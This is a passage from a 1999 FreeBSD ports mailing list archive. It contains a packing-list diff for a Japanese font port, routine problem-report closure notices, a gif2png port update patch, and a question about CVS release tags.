-share/fonts/makejvf/tfm/ptex/Ryumin-Light-J.tfm -share/fonts/makejvf/tfm/ptex/Ryumin-Light-V.tfm -share/fonts/makejvf/tfm/dvips/gbm.tfm -share/fonts/makejvf/tfm/dvips/gbmv.tfm -share/fonts/makejvf/tfm/dvips/rml.tfm -share/fonts/makejvf/tfm/dvips/rmlv.tfm -share/fonts/makejvf/tfm/dvips/futogo-b-v.tfm -share/fonts/makejvf/tfm/dvips/futogo-b.tfm -share/fonts/makejvf/tfm/dvips/futomin-b-v.tfm -share/fonts/makejvf/tfm/dvips/futomin-b.tfm -share/fonts/makejvf/tfm/dvips/gtbbb-m-v.tfm -share/fonts/makejvf/tfm/dvips/gtbbb-m.tfm -share/fonts/makejvf/tfm/dvips/jun101-l-v.tfm -share/fonts/makejvf/tfm/dvips/jun101-l.tfm -share/fonts/makejvf/tfm/dvips/ryumin-l-v.tfm -share/fonts/makejvf/tfm/dvips/ryumin-l.tfm -share/fonts/makejvf/vf/goth10.vf -share/fonts/makejvf/vf/goth5.vf -share/fonts/makejvf/vf/goth6.vf -share/fonts/makejvf/vf/goth7.vf -share/fonts/makejvf/vf/goth8.vf -share/fonts/makejvf/vf/goth9.vf -share/fonts/makejvf/vf/min10.vf -share/fonts/makejvf/vf/min5.vf -share/fonts/makejvf/vf/min6.vf -share/fonts/makejvf/vf/min7.vf -share/fonts/makejvf/vf/min8.vf -share/fonts/makejvf/vf/min9.vf -share/fonts/makejvf/vf/tgoth10.vf -share/fonts/makejvf/vf/tgoth5.vf -share/fonts/makejvf/vf/tgoth6.vf -share/fonts/makejvf/vf/tgoth7.vf -share/fonts/makejvf/vf/tgoth8.vf -share/fonts/makejvf/vf/tgoth9.vf -share/fonts/makejvf/vf/tmin10.vf -share/fonts/makejvf/vf/tmin5.vf -share/fonts/makejvf/vf/tmin6.vf -share/fonts/makejvf/vf/tmin7.vf -share/fonts/makejvf/vf/tmin8.vf -share/fonts/makejvf/vf/tmin9.vf -share/fonts/makejvf/vf/ngoth10.vf -share/fonts/makejvf/vf/ngoth5.vf -share/fonts/makejvf/vf/ngoth6.vf -share/fonts/makejvf/vf/ngoth7.vf -share/fonts/makejvf/vf/ngoth8.vf -share/fonts/makejvf/vf/ngoth9.vf -share/fonts/makejvf/vf/nmin10.vf -share/fonts/makejvf/vf/nmin5.vf -share/fonts/makejvf/vf/nmin6.vf -share/fonts/makejvf/vf/nmin7.vf -share/fonts/makejvf/vf/nmin8.vf -share/fonts/makejvf/vf/nmin9.vf -share/fonts/makejvf/vf/jis.vf -share/fonts/makejvf/vf/jisg.vf -share/fonts/makejvf/vf/FutoGoB101-Bold-H.vf -share/fonts/makejvf/vf/FutoGoB101-Bold-J.vf -share/fonts/makejvf/vf/FutoGoB101-Bold-V.vf -share/fonts/makejvf/vf/FutoMinA101-Bold-H.vf -share/fonts/makejvf/vf/FutoMinA101-Bold-J.vf -share/fonts/makejvf/vf/FutoMinA101-Bold-V.vf -share/fonts/makejvf/vf/GothicBBB-Medium-H.vf -share/fonts/makejvf/vf/GothicBBB-Medium-J.vf -share/fonts/makejvf/vf/GothicBBB-Medium-V.vf -share/fonts/makejvf/vf/Jun101-Light-H.vf -share/fonts/makejvf/vf/Jun101-Light-J.vf -share/fonts/makejvf/vf/Jun101-Light-V.vf -share/fonts/makejvf/vf/Ryumin-Light-H.vf -share/fonts/makejvf/vf/Ryumin-Light-J.vf -share/fonts/makejvf/vf/Ryumin-Light-V.vf -@dirrm share/fonts/makejvf/tfm/ptex -@dirrm share/fonts/makejvf/tfm/dvips -@dirrm share/fonts/makejvf/tfm -@dirrm share/fonts/makejvf/vf -@dirrm share/fonts/makejvf +share/texmf/dvips/makejvf/standard.map +share/texmf/dvips/makejvf/nmin-ngoth.map +share/texmf/dvips/makejvf/jis.map +share/texmf/dvips/makejvf/morisawa.map +share/texmf/fonts/tfm/makejvf/ptex/goth10.tfm +share/texmf/fonts/tfm/makejvf/ptex/goth5.tfm +share/texmf/fonts/tfm/makejvf/ptex/goth6.tfm +share/texmf/fonts/tfm/makejvf/ptex/goth7.tfm +share/texmf/fonts/tfm/makejvf/ptex/goth8.tfm +share/texmf/fonts/tfm/makejvf/ptex/goth9.tfm +share/texmf/fonts/tfm/makejvf/ptex/min10.tfm +share/texmf/fonts/tfm/makejvf/ptex/min5.tfm +share/texmf/fonts/tfm/makejvf/ptex/min6.tfm +share/texmf/fonts/tfm/makejvf/ptex/min7.tfm +share/texmf/fonts/tfm/makejvf/ptex/min8.tfm +share/texmf/fonts/tfm/makejvf/ptex/min9.tfm +share/texmf/fonts/tfm/makejvf/ptex/tgoth10.tfm +share/texmf/fonts/tfm/makejvf/ptex/tgoth5.tfm +share/texmf/fonts/tfm/makejvf/ptex/tgoth6.tfm +share/texmf/fonts/tfm/makejvf/ptex/tgoth7.tfm +share/texmf/fonts/tfm/makejvf/ptex/tgoth8.tfm +share/texmf/fonts/tfm/makejvf/ptex/tgoth9.tfm +share/texmf/fonts/tfm/makejvf/ptex/tmin10.tfm +share/texmf/fonts/tfm/makejvf/ptex/tmin5.tfm +share/texmf/fonts/tfm/makejvf/ptex/tmin6.tfm +share/texmf/fonts/tfm/makejvf/ptex/tmin7.tfm +share/texmf/fonts/tfm/makejvf/ptex/tmin8.tfm +share/texmf/fonts/tfm/makejvf/ptex/tmin9.tfm +share/texmf/fonts/tfm/makejvf/ptex/ngoth10.tfm +share/texmf/fonts/tfm/makejvf/ptex/ngoth5.tfm +share/texmf/fonts/tfm/makejvf/ptex/ngoth6.tfm +share/texmf/fonts/tfm/makejvf/ptex/ngoth7.tfm +share/texmf/fonts/tfm/makejvf/ptex/ngoth8.tfm +share/texmf/fonts/tfm/makejvf/ptex/ngoth9.tfm +share/texmf/fonts/tfm/makejvf/ptex/nmin10.tfm +share/texmf/fonts/tfm/makejvf/ptex/nmin5.tfm +share/texmf/fonts/tfm/makejvf/ptex/nmin6.tfm +share/texmf/fonts/tfm/makejvf/ptex/nmin7.tfm +share/texmf/fonts/tfm/makejvf/ptex/nmin8.tfm +share/texmf/fonts/tfm/makejvf/ptex/nmin9.tfm +share/texmf/fonts/tfm/makejvf/ptex/jis.tfm +share/texmf/fonts/tfm/makejvf/ptex/jisg.tfm +share/texmf/fonts/tfm/makejvf/ptex/FutoGoB101-Bold-H.tfm +share/texmf/fonts/tfm/makejvf/ptex/FutoGoB101-Bold-J.tfm +share/texmf/fonts/tfm/makejvf/ptex/FutoGoB101-Bold-V.tfm +share/texmf/fonts/tfm/makejvf/ptex/FutoMinA101-Bold-H.tfm +share/texmf/fonts/tfm/makejvf/ptex/FutoMinA101-Bold-J.tfm +share/texmf/fonts/tfm/makejvf/ptex/FutoMinA101-Bold-V.tfm +share/texmf/fonts/tfm/makejvf/ptex/GothicBBB-Medium-H.tfm +share/texmf/fonts/tfm/makejvf/ptex/GothicBBB-Medium-J.tfm +share/texmf/fonts/tfm/makejvf/ptex/GothicBBB-Medium-V.tfm +share/texmf/fonts/tfm/makejvf/ptex/Jun101-Light-H.tfm +share/texmf/fonts/tfm/makejvf/ptex/Jun101-Light-J.tfm +share/texmf/fonts/tfm/makejvf/ptex/Jun101-Light-V.tfm +share/texmf/fonts/tfm/makejvf/ptex/Ryumin-Light-H.tfm +share/texmf/fonts/tfm/makejvf/ptex/Ryumin-Light-J.tfm +share/texmf/fonts/tfm/makejvf/ptex/Ryumin-Light-V.tfm +share/texmf/fonts/tfm/makejvf/dvips/gbm.tfm +share/texmf/fonts/tfm/makejvf/dvips/gbmv.tfm +share/texmf/fonts/tfm/makejvf/dvips/rml.tfm +share/texmf/fonts/tfm/makejvf/dvips/rmlv.tfm +share/texmf/fonts/tfm/makejvf/dvips/futogo-b-v.tfm +share/texmf/fonts/tfm/makejvf/dvips/futogo-b.tfm +share/texmf/fonts/tfm/makejvf/dvips/futomin-b-v.tfm +share/texmf/fonts/tfm/makejvf/dvips/futomin-b.tfm +share/texmf/fonts/tfm/makejvf/dvips/gtbbb-m-v.tfm +share/texmf/fonts/tfm/makejvf/dvips/gtbbb-m.tfm +share/texmf/fonts/tfm/makejvf/dvips/jun101-l-v.tfm +share/texmf/fonts/tfm/makejvf/dvips/jun101-l.tfm +share/texmf/fonts/tfm/makejvf/dvips/ryumin-l-v.tfm +share/texmf/fonts/tfm/makejvf/dvips/ryumin-l.tfm +share/texmf/fonts/vf/makejvf/goth10.vf +share/texmf/fonts/vf/makejvf/goth5.vf +share/texmf/fonts/vf/makejvf/goth6.vf +share/texmf/fonts/vf/makejvf/goth7.vf +share/texmf/fonts/vf/makejvf/goth8.vf +share/texmf/fonts/vf/makejvf/goth9.vf +share/texmf/fonts/vf/makejvf/min10.vf +share/texmf/fonts/vf/makejvf/min5.vf +share/texmf/fonts/vf/makejvf/min6.vf +share/texmf/fonts/vf/makejvf/min7.vf +share/texmf/fonts/vf/makejvf/min8.vf +share/texmf/fonts/vf/makejvf/min9.vf +share/texmf/fonts/vf/makejvf/tgoth10.vf +share/texmf/fonts/vf/makejvf/tgoth5.vf +share/texmf/fonts/vf/makejvf/tgoth6.vf +share/texmf/fonts/vf/makejvf/tgoth7.vf +share/texmf/fonts/vf/makejvf/tgoth8.vf +share/texmf/fonts/vf/makejvf/tgoth9.vf +share/texmf/fonts/vf/makejvf/tmin10.vf +share/texmf/fonts/vf/makejvf/tmin5.vf +share/texmf/fonts/vf/makejvf/tmin6.vf +share/texmf/fonts/vf/makejvf/tmin7.vf +share/texmf/fonts/vf/makejvf/tmin8.vf +share/texmf/fonts/vf/makejvf/tmin9.vf +share/texmf/fonts/vf/makejvf/ngoth10.vf +share/texmf/fonts/vf/makejvf/ngoth5.vf +share/texmf/fonts/vf/makejvf/ngoth6.vf +share/texmf/fonts/vf/makejvf/ngoth7.vf +share/texmf/fonts/vf/makejvf/ngoth8.vf +share/texmf/fonts/vf/makejvf/ngoth9.vf +share/texmf/fonts/vf/makejvf/nmin10.vf +share/texmf/fonts/vf/makejvf/nmin5.vf +share/texmf/fonts/vf/makejvf/nmin6.vf +share/texmf/fonts/vf/makejvf/nmin7.vf +share/texmf/fonts/vf/makejvf/nmin8.vf +share/texmf/fonts/vf/makejvf/nmin9.vf +share/texmf/fonts/vf/makejvf/jis.vf +share/texmf/fonts/vf/makejvf/jisg.vf +share/texmf/fonts/vf/makejvf/FutoGoB101-Bold-H.vf +share/texmf/fonts/vf/makejvf/FutoGoB101-Bold-J.vf +share/texmf/fonts/vf/makejvf/FutoGoB101-Bold-V.vf +share/texmf/fonts/vf/makejvf/FutoMinA101-Bold-H.vf +share/texmf/fonts/vf/makejvf/FutoMinA101-Bold-J.vf +share/texmf/fonts/vf/makejvf/FutoMinA101-Bold-V.vf +share/texmf/fonts/vf/makejvf/GothicBBB-Medium-H.vf +share/texmf/fonts/vf/makejvf/GothicBBB-Medium-J.vf +share/texmf/fonts/vf/makejvf/GothicBBB-Medium-V.vf +share/texmf/fonts/vf/makejvf/Jun101-Light-H.vf +share/texmf/fonts/vf/makejvf/Jun101-Light-J.vf +share/texmf/fonts/vf/makejvf/Jun101-Light-V.vf +share/texmf/fonts/vf/makejvf/Ryumin-Light-H.vf +share/texmf/fonts/vf/makejvf/Ryumin-Light-J.vf +share/texmf/fonts/vf/makejvf/Ryumin-Light-V.vf +@dirrm share/texmf/fonts/tfm/makejvf/ptex +@dirrm share/texmf/fonts/tfm/makejvf/dvips +@dirrm share/texmf/fonts/tfm/makejvf +@dirrm share/texmf/fonts/vf/makejvf @dirrm share/doc/makejvf-fkr >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 9:27:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CE8B815817; Thu, 23 Dec 1999 09:27:18 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA97912; Thu, 23 Dec 1999 09:27:18 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 09:27:18 -0800 (PST) From: Message-Id: <199912231727.JAA97912@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15465: Update port: cad/xcircuit to 2.0b1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: cad/xcircuit to 2.0b1 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 09:18:57 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10: 0:49 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 162181591E; Thu, 23 Dec 1999 10:00:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA00436; Thu, 23 Dec 1999 10:00:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:00:41 -0800 (PST) From: Message-Id: <199912231800.KAA00436@freefall.freebsd.org> To: murray@cdrom.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15319: Mailcrypt upgrade from 3.4 to 3.5.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Mailcrypt upgrade from 3.4 to 3.5.5 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 09:59:57 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10: 2: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D8C29156C4; Thu, 23 Dec 1999 10:02:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA00714; Thu, 23 Dec 1999 10:02:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:02:00 -0800 (PST) From: Message-Id: <199912231802.KAA00714@freefall.freebsd.org> To: mami@whale.cc.muroran-it.ac.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15324: Update port: graphics/enfle Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/enfle State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:01:14 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10: 4:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 047E9159F1; Thu, 23 Dec 1999 10:04:12 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA01025; Thu, 23 Dec 1999 10:04:12 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:04:12 -0800 (PST) From: Message-Id: <199912231804.KAA01025@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15334: Update port: audio/gsm Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: audio/gsm State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:02:46 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10: 7:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3255E15888; Thu, 23 Dec 1999 10:07:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA01430; Thu, 23 Dec 1999 10:07:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:07:43 -0800 (PST) From: Message-Id: <199912231807.KAA01430@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15335: Update port: graphics/dore Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/dore State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:05:35 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10: 9:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C604E157A8; Thu, 23 Dec 1999 10:09:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA01715; Thu, 23 Dec 1999 10:09:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:09:38 -0800 (PST) From: Message-Id: <199912231809.KAA01715@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15336: Update port: graphics/epstool Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/epstool State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:08:17 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:12:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C5241157CB; Thu, 23 Dec 1999 10:12:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA02030; Thu, 23 Dec 1999 10:12:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:12:11 -0800 (PST) From: Message-Id: <199912231812.KAA02030@freefall.freebsd.org> To: paxvel@iname.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15343: Port update: net/icqlib Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Port update: net/icqlib State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:10:05 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:13:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 05759159C1; Thu, 23 Dec 1999 10:13:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA02202; Thu, 23 Dec 1999 10:13:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:13:25 -0800 (PST) From: Message-Id: <199912231813.KAA02202@freefall.freebsd.org> To: paxvel@iname.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15344: Port update: net/kicq Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Port update: net/kicq State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:12:49 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:15:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3FF7715839; Thu, 23 Dec 1999 10:15:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA02495; Thu, 23 Dec 1999 10:15:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:15:32 -0800 (PST) From: Message-Id: <199912231815.KAA02495@freefall.freebsd.org> To: sobomax@altavista.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15355: [PATCH] New version 2.4 of WmakerConf (x11-wm/wmakerconf) port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] New version 2.4 of WmakerConf (x11-wm/wmakerconf) port State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:14:03 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:21:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DBD6115809; Thu, 23 Dec 1999 10:21:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA03201; Thu, 23 Dec 1999 10:21:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:21:40 -0800 (PST) From: Message-Id: <199912231821.KAA03201@freefall.freebsd.org> To: taguchi@tohoku.iij.ad.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15348: [update] japanese/tcl80 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [update] japanese/tcl80 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:16:16 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:30:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 85EF915699 for ; Thu, 23 Dec 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA04052; Thu, 23 Dec 1999 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from tricord.system.pl (tricord.system.pl [195.205.185.10]) by hub.freebsd.org (Postfix) with ESMTP id EC04514E6D for ; Thu, 23 Dec 1999 10:27:37 -0800 (PST) (envelope-from saper@saperski.system.pl) Received: from saperski.system.pl (saperski.system.pl [195.205.185.24]) by tricord.system.pl (SYSTEM Internet) with ESMTP id TAA23904; Thu, 23 Dec 1999 19:27:42 +0100 (MET) Received: (from saper@localhost) by saperski.system.pl (8.9.3/8.9.3) id TAA38310; Thu, 23 Dec 1999 19:28:57 +0100 (CET) (envelope-from saper) Message-Id: <199912231828.TAA38310@saperski.system.pl> Date: Thu, 23 Dec 1999 19:28:57 +0100 (CET) From: saper@system.pl Reply-To: saper@system.pl To: FreeBSD-gnats-submit@freebsd.org Cc: saper@system.pl X-Send-Pr-Version: 3.2 Subject: ports/15652: Update graphics/gif2png to version 2.2.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15652 >Category: ports >Synopsis: Update graphics/gif2png to version 2.2.5 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 10:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Marcin Cie¶lak >Release: FreeBSD 3.4-RC i386 >Organization: SYSTEM Internet Provider >Environment: FreeBSD 3.4-RC #5: Thu Dec 16 19:52:18 CET 1999 >Description: * Upgrade port to 2.2.5 * Remove manual patch web2png #! line (merged into original) >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/graphics/gif2png/Makefile,v retrieving revision 1.4 diff -u -r1.4 Makefile --- Makefile 1999/11/01 05:54:57 1.4 +++ Makefile 1999/12/23 18:09:31 @@ -1,12 +1,12 @@ # New ports collection makefile for: gif2png -# Version required: 2.0.0 -# Date created: 30 Aug 1999 +# Version required: 2.2.5 +# Date created: 22 Dec 1999 # Whom: saper@system.pl # # $FreeBSD: ports/graphics/gif2png/Makefile,v 1.4 1999/11/01 05:54:57 steve Exp $ # -DISTNAME= gif2png-2.0.0 +DISTNAME= gif2png-2.2.5 CATEGORIES= graphics MASTER_SITES= http://www.tuxedo.org/~esr/gif2png/ @@ -16,10 +16,6 @@ GNU_CONFIGURE= yes CONFIGURE_ENV= LDFLAGS="-L${LOCALBASE}/lib" CPPFLAGS="-I${LOCALBASE}/include" - -pre-build: - mv ${WRKSRC}/web2png ${WRKSRC}/web2png_prepatch - $(SED) -e '1s#/usr/bin/python#/usr/bin/env python#' ${WRKSRC}/web2png_prepatch > ${WRKSRC}/web2png MAN1= gif2png.1 web2png.1 Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/graphics/gif2png/files/md5,v retrieving revision 1.3 diff -u -r1.3 md5 --- md5 1999/11/01 05:55:01 1.3 +++ md5 1999/12/23 18:07:39 @@ -1 +1 @@ -MD5 (gif2png-2.0.0.tar.gz) = 05cb99695051ad3324ceff7321fcc058 +MD5 (gif2png-2.2.5.tar.gz) = 7ef87d38835369ace3cd49b675a2e7e3 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:30:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8A82A15740; Thu, 23 Dec 1999 10:30:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA04246; Thu, 23 Dec 1999 10:30:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:30:42 -0800 (PST) From: Message-Id: <199912231830.KAA04246@freefall.freebsd.org> To: taguchi@tohoku.iij.ad.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15349: [update] japanese/tk80 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [update] japanese/tk80 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:28:58 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:32:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from tricord.system.pl (tricord.system.pl [195.205.185.10]) by hub.freebsd.org (Postfix) with ESMTP id 5CC84157B2 for ; Thu, 23 Dec 1999 10:31:26 -0800 (PST) (envelope-from saper@system.pl) Received: from localhost (saper@localhost [127.0.0.1]) by tricord.system.pl (SYSTEM Internet) with ESMTP id TAA23974 for ; Thu, 23 Dec 1999 19:31:30 +0100 (MET) Date: Thu, 23 Dec 1999 19:31:26 +0100 (MET) From: Marcin Cieslak To: freebsd-ports@freebsd.org Subject: CVS release tags on ports Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What are the rules on setting CVS release tags in the ports tree? One example: RCS file: /home/ncvs/ports/graphics/gif2png/Makefile,v Working file: Makefile head: 1.4 branch: locks: strict access list: symbolic names: RELEASE_3_4_0: 1.4 RELEASE_3_3_0: 1.1.1.1 v_0_6: 1.1.1.1 SAPER: 1.1.1 and the other: RCS file: /home/ncvs/ports/graphics/dia/Makefile,v Working file: Makefile head: 1.2 branch: locks: strict access list: symbolic names: RELEASE_3_4_0: 1.1.1.1 v0_81: 1.1.1.1 MARCIN: 1.1.1 keyword substitution: kv total revisions: 3; selected revisions: 3 description: I guess that "SAPER" and "MARCIN" are derived from my name and login, and v0_81 are from versions? -- << Marcin Cieslak // saper@system.pl >> ----------------------------------------------------------------- SYSTEM Internet Provider http://www.system.pl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:35:45 1999 